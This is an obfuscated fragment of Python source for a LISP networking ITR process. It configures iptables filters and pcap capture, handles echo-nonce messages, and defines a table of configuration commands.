if ( lisp . lisp_is_mac_string ( OO0 ) ) : continue
iIiiIi11IIi = "" if OO0 . find ( ":" ) == - 1 else "6"
os . system ( Oo00OO0OO . format ( iIiiIi11IIi , OO0 ) )
if 64 - 64: OoooooooOO . I1ii11iIi11i % O0 + I1IiiI - o0oOOo0O0Ooo
if 84 - 84: i11iIiiIii * Ii1I . i11iIiiIii
if 12 - 12: OoOoOO00 % IiII % I1ii11iIi11i . i11iIiiIii * iIii1I11I1II1
if 66 - 66: i11iIiiIii * iIii1I11I1II1 % OoooooooOO
if 5 - 5: OoOoOO00 % OoooooooOO
if 60 - 60: OoOoOO00 . i1IIi % OoO0O00 % ooOoO0o % OOooOOo
if 33 - 33: iIii1I11I1II1 - Ii1I * I1ii11iIi11i % iIii1I11I1II1 + OoO0O00 . OOooOOo
if 56 - 56: i11iIiiIii * iII111i . oO0o
if ( lisp . lisp_pitr == False ) :
Oo00OO0OO = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
ooooO0O = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
for o0OO0 in sources :
if ( lisp . lisp_is_mac_string ( o0OO0 ) ) : continue
if ( o0OO0 in dyn_eids ) : continue
iIiiIi11IIi = "" if o0OO0 . find ( ":" ) == - 1 else "6"
for O0OOO0OOoO0O in sources :
if ( lisp . lisp_is_mac_string ( O0OOO0OOoO0O ) ) : continue
if ( O0OOO0OOoO0O in dyn_eids ) : continue
if ( O0OOO0OOoO0O . find ( "." ) != - 1 and o0OO0 . find ( "." ) == - 1 ) : continue
if ( O0OOO0OOoO0O . find ( ":" ) != - 1 and o0OO0 . find ( ":" ) == - 1 ) : continue
if ( getoutput ( ooooO0O . format ( iIiiIi11IIi , o0OO0 , O0OOO0OOoO0O ) ) == "" ) :
continue
if 81 - 81: i1IIi % o0oOOo0O0Ooo - I1Ii111 + i11iIiiIii - OoooooooOO
os . system ( Oo00OO0OO . format ( iIiiIi11IIi , o0OO0 , O0OOO0OOoO0O ) )
if 50 - 50: Ii1I - i11iIiiIii + iIii1I11I1II1 / O0 - Ii1I + o0oOOo0O0Ooo
if 22 - 22: II111iiii - Ii1I / ooOoO0o % OoooooooOO + OOooOOo
if 5 - 5: OoO0O00 / iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
iii1IiI1I1 = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
for o0OO0 in sources :
if ( lisp . lisp_is_mac_string ( o0OO0 ) ) : continue
iIiiIi11IIi = "" if o0OO0 . find ( ":" ) == - 1 else "6"
os . system ( iii1IiI1I1 . format ( iIiiIi11IIi , o0OO0 ) )
if 64 - 64: ooOoO0o / O0 * OoOoOO00 * ooOoO0o
if 60 - 60: I11i / i1IIi % I1ii11iIi11i / I1ii11iIi11i * I1ii11iIi11i . i11iIiiIii
if 99 - 99: OoOoOO00
if 77 - 77: o0oOOo0O0Ooo
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
oo000oO = getoutput ( "sudo iptables -t raw -S lisp" ) . split ( "\n" )
oo000oO += getoutput ( "sudo ip6tables -t raw -S lisp" ) . split ( "\n" )
lisp . lprint ( "Using kernel filters: {}" . format ( oo000oO ) )
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
if 27 - 27: Ii1I - O0 % I11i * I1Ii111 . IiII % iIii1I11I1II1
if 37 - 37: OoooooooOO + O0 - i1IIi % ooOoO0o
if 24 - 24: OoOoOO00
if 94 - 94: i1IIi * i1IIi % II111iiii + OOooOOo
if 28 - 28: I1IiiI
if 49 - 49: I11i . o0oOOo0O0Ooo % oO0o / Ii1I
if 95 - 95: O0 * OoOoOO00 * IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if ( os . getenv ( "LISP_VIRTIO_BUG" ) != None ) :
oO00o = ( "sudo iptables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 36 - 36: I1Ii111 . II111iiii % ooOoO0o
oO00o += ( "sudo iptables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill; " )
if 84 - 84: OoooooooOO - i11iIiiIii / iIii1I11I1II1 / OoooooooOO / I1ii11iIi11i
oO00o += ( "sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 4 - 4: Oo0Ooo + o0oOOo0O0Ooo
oO00o += ( "sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill" )
if 17 - 17: OoO0O00 * OoOoOO00
os . system ( oO00o )
ii11i = lisp . bold ( "virtio" , False )
lisp . lprint ( "{} bug workaround, configure '{}'" . format ( ii11i , oO00o ) )
if 71 - 71: I1Ii111 / I1ii11iIi11i * iIii1I11I1II1
return
if 57 - 57: OOooOOo + I1Ii111 % I1ii11iIi11i . OoO0O00 / OoO0O00 * O0
if 6 - 6: i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
if 37 - 37: IiII
if 37 - 37: Oo0Ooo / IiII * O0
if 73 - 73: iII111i * iII111i / ooOoO0o
def o00oOo0oOoo ( sources , dyn_eids , l2_overlay , pitr ) :
if ( l2_overlay ) :
i1I11IiI1iiII = "ether[6:4] >= 0 and ether[10:2] >= 0"
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
if 41 - 41: I1ii11iIi11i + Ii1I % OoooooooOO . I1ii11iIi11i + iII111i . iII111i
Iiii11I = "(not ether proto 0x806)"
OO00OO0O0 = " or (udp src port 4342 and ip[28] == 0x28)"
OO0ooo0 = " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 7 - 7: I1ii11iIi11i - oO0o * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i
if 85 - 85: O0
Iii = ""
IiI1I1 = ""
for o0OO0 in sources :
iI111i11iI1 = o0OO0
if ( lisp . lisp_is_mac_string ( o0OO0 ) ) :
iI111i11iI1 = o0OO0 . split ( "/" ) [ 0 ]
iI111i11iI1 = iI111i11iI1 . replace ( "-" , "" )
III1ii = [ ]
for IIiiii in range ( 0 , 12 , 2 ) : III1ii . append ( iI111i11iI1 [ IIiiii : IIiiii + 2 ] )
iI111i11iI1 = "ether host " + ":" . join ( III1ii )
if 23 - 23: oO0o * iII111i
if 53 - 53: Ii1I - OoOoOO00 . iII111i . I1Ii111
Iii += "{}" . format ( iI111i11iI1 )
if ( o0OO0 not in dyn_eids ) : IiI1I1 += "{}" . format ( iI111i11iI1 )
if ( sources [ - 1 ] == o0OO0 ) : break
Iii += " or "
if ( o0OO0 not in dyn_eids ) : IiI1I1 += " or "
if 48 - 48: iII111i + IiII
if ( IiI1I1 [ - 4 : : ] == " or " ) : IiI1I1 = IiI1I1 [ 0 : - 4 ]
if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
if 14 - 14: OOooOOo
if 79 - 79: Ii1I
if 76 - 76: iIii1I11I1II1
if 80 - 80: iIii1I11I1II1 . O0 / Ii1I % Ii1I
if 93 - 93: OoooooooOO * Oo0Ooo
I1IiI1iIiIiii = getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
I1IiI1iIiIiii = ( I1IiI1iIiIiii != "" and I1IiI1iIiIiii [ 0 ] == " " )
I1iiI1II = lisp . lisp_get_loopback_address ( ) if ( I1IiI1iIiIiii ) else None
if 44 - 44: Oo0Ooo / i1IIi + iIii1I11I1II1 / iIii1I11I1II1 * iIii1I11I1II1 . Ii1I
Oo = ""
ii1IIi1ii = lisp . lisp_get_all_addresses ( )
for OO0 in ii1IIi1ii :
if ( OO0 == I1iiI1II ) : continue
Oo += "{}" . format ( OO0 )
if ( ii1IIi1ii [ - 1 ] == OO0 ) : break
Oo += " or "
if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
if 44 - 44: iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if ( Iii != "" ) :
Iii = " and (src net {})" . format ( Iii )
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if ( IiI1I1 != "" ) :
IiI1I1 = " and not (dst net {})" . format ( IiI1I1 )
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if ( Oo != "" ) :
Oo = " and not (dst host {})" . format ( Oo )
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
if 68 - 68: oO0o
if 10 - 10: Ii1I
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if ( pitr ) :
IiI1I1 = ""
Oo = Oo . replace ( "dst " , "" )
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
i1I11IiI1iiII = Iiii11I + Iii + IiI1I1 + Oo
i1I11IiI1iiII += OO00OO0O0
i1I11IiI1iiII += OO0ooo0
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
def iiiI1I1iIIIi1 ( device , pfilter , pcap_lock ) :
lisp . lisp_set_exception ( )
if 56 - 56: i11iIiiIii - iIii1I11I1II1 . II111iiii
if ( lisp . lisp_is_python2 ( ) ) :
import pcappy
pcap_lock . acquire ( )
O00O = pcappy . open_live ( device , 9000 , 0 , 100 )
pcap_lock . release ( )
O00O . filter = pfilter
O00O . loop ( - 1 , Iiii1ii , device )
if 2 - 2: oO0o . I1Ii111 * Oo0Ooo + O0 - I11i * iIii1I11I1II1
if ( lisp . lisp_is_python3 ( ) ) :
import pcapy
pcap_lock . acquire ( )
O00O = pcapy . open_live ( device , 9000 , 0 , 100 )
pcap_lock . release ( )
O00O . setfilter ( pfilter )
while ( True ) :
II111i1ii1iII , ooo0OoO = O00O . next ( )
Iiii1ii ( device , None , ooo0OoO )
if 50 - 50: I1IiiI * OOooOOo + ooOoO0o
if 88 - 88: I11i + i11iIiiIii % oO0o * OOooOOo * OOooOOo * Ii1I
return
if 24 - 24: ooOoO0o / iII111i + IiII . IiII
if 39 - 39: ooOoO0o + O0 / i1IIi % IiII / oO0o * IiII
if 77 - 77: IiII . I1Ii111 % OoOoOO00
if 42 - 42: IiII % iII111i % o0oOOo0O0Ooo % oO0o + I11i % OoOoOO00
if 3 - 3: oO0o
if 64 - 64: OoO0O00 . I1IiiI - OoooooooOO . ooOoO0o - iII111i
if 77 - 77: Ii1I % OoOoOO00 / II111iiii % iII111i % OoooooooOO % OoO0O00
if 19 - 19: IiII * I1Ii111 / oO0o * I1Ii111 - OoooooooOO * I11i
if 17 - 17: II111iiii + Oo0Ooo . I1Ii111
def I1I1i1i ( ) :
global I11
global II1Ii1iI1i
global II1iII1i
if 87 - 87: OoOoOO00 / IiII . ooOoO0o - OOooOOo / OoO0O00
lisp . lisp_set_exception ( )
if 41 - 41: II111iiii
if 27 - 27: Oo0Ooo * OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
iiiii111 = [ II1Ii1iI1i , II1Ii1iI1i ,
oO0oIIII ]
lisp . lisp_build_info_requests ( iiiii111 , None , lisp . LISP_CTRL_PORT )
if 93 - 93: oO0o * Ii1I
if 27 - 27: I1IiiI * ooOoO0o
if 77 - 77: IiII
if 66 - 66: iIii1I11I1II1 . i11iIiiIii / I11i / ooOoO0o + I1Ii111
I11 . cancel ( )
I11 = threading . Timer ( lisp . LISP_INFO_INTERVAL ,
I1I1i1i , [ ] )
I11 . start ( )
return
if 5 - 5: OoOoOO00 % iII111i + IiII
if 13 - 13: IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
if 84 - 84: ooOoO0o + i11iIiiIii - OOooOOo * ooOoO0o
def I1IiiIiii1 ( kv_pair ) :
global II1iII1i
global iiI1iIiI
global I11
if 39 - 39: ooOoO0o / O0 * IiII
lispconfig . lisp_map_resolver_command ( kv_pair )
if 17 - 17: Ii1I / iIii1I11I1II1 - OoO0O00 + I1IiiI % OOooOOo
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ II1iII1i , iiI1iIiI ] )
lisp . lisp_test_mr_timer . start ( )
if 14 - 14: o0oOOo0O0Ooo % IiII + I1ii11iIi11i + OoO0O00
if 76 - 76: OoO0O00 - i11iIiiIii + OoOoOO00 + OOooOOo / OoooooooOO
if 50 - 50: II111iiii - I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1
if 91 - 91: II111iiii - O0 . iIii1I11I1II1 . O0 + I1ii11iIi11i - II111iiii
if 26 - 26: o0oOOo0O0Ooo
I11 = threading . Timer ( 0 , I1I1i1i , [ ] )
I11 . start ( )
return
if 12 - 12: OoooooooOO / O0 + II111iiii * I1ii11iIi11i
if 46 - 46: II111iiii - IiII * OoooooooOO / oO0o % IiII
if 11 - 11: iIii1I11I1II1 . OoOoOO00 / IiII % ooOoO0o
if 61 - 61: ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
def OOoOOOO00 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
return
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
def OoOooOO0oOOo0O ( kv_pair ) :
global i111I
if 42 - 42: iII111i / o0oOOo0O0Ooo + Oo0Ooo . Oo0Ooo % OOooOOo
if 16 - 16: i1IIi + OoO0O00 % OoOoOO00 + Ii1I * Oo0Ooo
if 3 - 3: i11iIiiIii
if 81 - 81: I1IiiI . OoooooooOO * Ii1I . oO0o - O0 * oO0o
if 72 - 72: II111iiii - OOooOOo + I1IiiI - I11i
oO00O = lisp . lisp_nat_traversal
II111IiiiI1 = lisp . lisp_rloc_probing
if 75 - 75: ooOoO0o
if 29 - 29: I1ii11iIi11i
if 53 - 53: i11iIiiIii . I1ii11iIi11i % Ii1I / ooOoO0o % iIii1I11I1II1
if 6 - 6: Oo0Ooo - OOooOOo . iIii1I11I1II1
lispconfig . lisp_xtr_command ( kv_pair )
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
if 36 - 36: I11i % OOooOOo
if 72 - 72: I1IiiI / iII111i - O0 + I11i
if 83 - 83: O0
oOOOOOo = ( oO00O == False and lisp . lisp_nat_traversal and lisp . lisp_rloc_probing )
if 50 - 50: I1Ii111 + ooOoO0o + iII111i
ii11iiI11I = ( II111IiiiI1 == False and lisp . lisp_rloc_probing )
if 96 - 96: iIii1I11I1II1 + i11iIiiIii - Oo0Ooo . ooOoO0o
iiIi11i1IiI = 0
if ( ii11iiI11I ) : iiIi11i1IiI = 1
if ( oOOOOOo ) : iiIi11i1IiI = 5
if 88 - 88: I1ii11iIi11i - Ii1I * OoOoOO00
if ( iiIi11i1IiI != 0 ) :
OOOOO0o0OOo = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( iiIi11i1IiI , OOOOO0o0OOo )
if 40 - 40: IiII * oO0o % I11i * I1ii11iIi11i
if 80 - 80: iIii1I11I1II1 - OoooooooOO - I1ii11iIi11i - I1ii11iIi11i . OoooooooOO
if 48 - 48: I1Ii111 . i11iIiiIii / i1IIi % IiII % iII111i + oO0o
if 41 - 41: IiII
if 3 - 3: IiII + II111iiii / iIii1I11I1II1
if 10 - 10: II111iiii . O0
if 31 - 31: oO0o / i11iIiiIii / O0
if ( lisp . lisp_crypto_ephem_port == None and lisp . lisp_data_plane_security ) :
oOo00Oo0o0Oo = i111I . getsockname ( ) [ 1 ]
lisp . lisp_crypto_ephem_port = oOo00Oo0o0Oo
lisp . lprint ( "Use port {} for lisp-crypto packets" . format ( oOo00Oo0o0Oo ) )
iiI1ii = { "type" : "itr-crypto-port" , "port" : oOo00Oo0o0Oo }
lisp . lisp_write_to_dp_socket ( iiI1ii )
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
if 94 - 94: iII111i - Oo0Ooo + oO0o
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
def I1i1II1 ( ipc ) :
oOOoo , I1oo , iiI1IIIii , oOO0o00O = ipc . split ( "%" )
oOO0o00O = int ( oOO0o00O , 16 )
if 24 - 24: I1IiiI . I1Ii111 % Ii1I
OOoooo0oo = lisp . lisp_get_echo_nonce ( None , iiI1IIIii )
if ( OOoooo0oo == None ) : OOoooo0oo = lisp . lisp_echo_nonce ( iiI1IIIii )
if 92 - 92: oO0o / OOooOOo . I1ii11iIi11i
if 30 - 30: Ii1I . I1ii11iIi11i / OOooOOo
if 2 - 2: IiII % I1IiiI - I1Ii111
if 79 - 79: OoooooooOO / I1ii11iIi11i . O0
if 79 - 79: oO0o - II111iiii
if ( I1oo == "R" ) :
OOoooo0oo . request_nonce_rcvd = oOO0o00O
OOoooo0oo . last_request_nonce_rcvd = lisp . lisp_get_timestamp ( )
OOoooo0oo . echo_nonce_sent = oOO0o00O
OOoooo0oo . last_new_echo_nonce_sent = lisp . lisp_get_timestamp ( )
lisp . lprint ( "Start echo-nonce mode for {}, nonce 0x{}" . format ( lisp . red ( OOoooo0oo . rloc_str , False ) , lisp . lisp_hex_string ( oOO0o00O ) ) )
if 43 - 43: i1IIi + O0 % OoO0O00 / Ii1I * I1IiiI
if 89 - 89: I1IiiI . Oo0Ooo + I1ii11iIi11i . O0 % o0oOOo0O0Ooo
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if ( I1oo == "E" ) :
OOoooo0oo . echo_nonce_rcvd = oOO0o00O
OOoooo0oo . last_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if ( OOoooo0oo . request_nonce_sent == oOO0o00O ) :
Ii1ii1IiiiiiI = lisp . bold ( "echoed nonce" , False )
lisp . lprint ( "Received {} {} from {}" . format ( Ii1ii1IiiiiiI ,
lisp . lisp_hex_string ( oOO0o00O ) ,
lisp . red ( OOoooo0oo . rloc_str , False ) ) )
if 77 - 77: i11iIiiIii
OOoooo0oo . request_nonce_sent = None
lisp . lprint ( "Stop request-nonce mode for {}" . format ( lisp . red ( OOoooo0oo . rloc_str , False ) ) )
if 20 - 20: I11i * I1IiiI
OOoooo0oo . last_good_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
else :
o0oO0o0oo0O0 = "none"
if ( OOoooo0oo . request_nonce_sent ) :
o0oO0o0oo0O0 = lisp . lisp_hex_string ( OOoooo0oo . request_nonce_sent )
if 98 - 98: IiII * iIii1I11I1II1 . Ii1I * Oo0Ooo / I1ii11iIi11i + ooOoO0o
lisp . lprint ( ( "Received echo-nonce 0x{} from {}, but request-" + "nonce is {}" ) . format ( lisp . lisp_hex_string ( oOO0o00O ) ,
# oO0o . OoooooooOO
lisp . red ( OOoooo0oo . rloc_str , False ) , o0oO0o0oo0O0 ) )
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
return
if 33 - 33: I11i % II111iiii + OoO0O00
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
o00000oo00 = {
"lisp xtr-parameters" : [ OoOooOO0oOOo0O , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"multi-tenant-eid" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-device" : [ True ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ I1IiiIiii1 , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-server" : [ lispconfig . lisp_map_server_command , {
"ms-name" : [ True ] ,
"address" : [ True ] ,
"dns-name" : [ True ] ,
"authentication-type" : [ False , "sha1" , "sha2" ] ,
"authentication-key" : [ False ] ,
"encryption-key" : [ False ] ,
"proxy-reply" : [ False , "yes" , "no" ] ,
"want-map-notify" : [ False , "yes" , "no" ] ,
"merge-registrations" : [ False , "yes" , "no" ] ,
"refresh-registrations" : [ False , "yes" , "no" ] ,
"site-id" : [ False , 1 , 0xffffffffffffffff ] } ] ,
"lisp database-mapping" : [ OOoOOOO00 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"register-ttl" : [ True , 1 , 0xffffffff ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"subscribe-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp itr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp geo-coordinates" : [ lispconfig . lisp_geo_command , {
"geo-name" : [ False ] ,
"geo-tag" : [ False ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"show itr-map-cache" : [ IIiiIiI1 , { } ] ,
"show itr-rloc-probing" : [ I1i1iii , { } ] ,
"show itr-keys" : [ oo , { } ] ,
"show itr-dynamic-eid" : [ lispconfig . lisp_show_dynamic_eid_command , { } ]
}
if 41 - 41: OOooOOo - o0oOOo0O0Ooo + Ii1I
if 15 - 15: I11i / o0oOOo0O0Ooo + Ii1I
if 76 - 76: Ii1I + OoooooooOO / OOooOOo % OoO0O00 / I1ii11iIi11i
if 38 - 38: I1Ii111 . iII111i . I1IiiI * OoO0O00
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii / Ii1I
if 93 - 93: ooOoO0o
if ( I111I1Iiii1i ( ) == False ) :
lisp . lprint ( "lisp_itr_startup() failed" )
lisp . lisp_print_banner ( "ITR abnormal exit" )
exit ( 1 )
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
IiI = [ i111I , oO0oIIII ,
II1Ii1iI1i , Oo0oO0oo0oO00 ]
if 4 - 4: OoooooooOO + ooOoO0o . i1IIi / O0 - O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
iiI = True
O0OO0o0O00oO = [ i111I ] * 3
o00O = [ II1Ii1iI1i ] * 3
if 92 - 92: Oo0Ooo - I1Ii111
while ( True ) :
try : IIi11 , o0O0oo0 , oOOoo = select . select ( IiI , [ ] , [ ] )
except : break
if 33 - 33: o0oOOo0O0Ooo / O0 + OOooOOo
if 75 - 75: IiII % i11iIiiIii + iIii1I11I1II1
if 92 - 92: OoOoOO00 % O0
if 55 - 55: iIii1I11I1II1 * iII111i
